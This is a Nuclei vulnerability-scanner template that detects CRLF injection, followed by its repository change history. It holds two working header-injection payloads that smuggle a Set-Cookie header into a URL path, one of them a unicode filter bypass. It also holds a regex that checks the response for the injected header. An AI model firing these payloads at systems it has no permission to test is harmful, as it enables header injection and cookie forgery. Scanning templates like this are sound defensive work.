nuclei-templates/vulnerabilities/crlf-injection.yaml

id: crlf-injection

info:
  name: CRLF injection
  author: nadino
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" #unicode bypass
    matchers:
      - type: regex
        regex:
        - "(^Set-Cookie:|;(| ))( |)crlfinjection=crlfinjection($|;)"
        part: header
CRLF injection CRLF injection with normal encoding and unicode bypass encoding https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection 2020-05-04 15:53:49 +00:00			`id: crlf-injection`

			`info:`
			`name: CRLF injection`
			`author: nadino`
			`severity: low`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"`
			`- "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" #unicode bypass`
			`matchers:`
Update crlf-injection.yaml 2020-05-24 12:22:35 +00:00			`- type: regex`
			`regex:`
			`- "(^Set-Cookie:\|;(\| ))( \|)crlfinjection=crlfinjection($\|;)"`
			`part: header`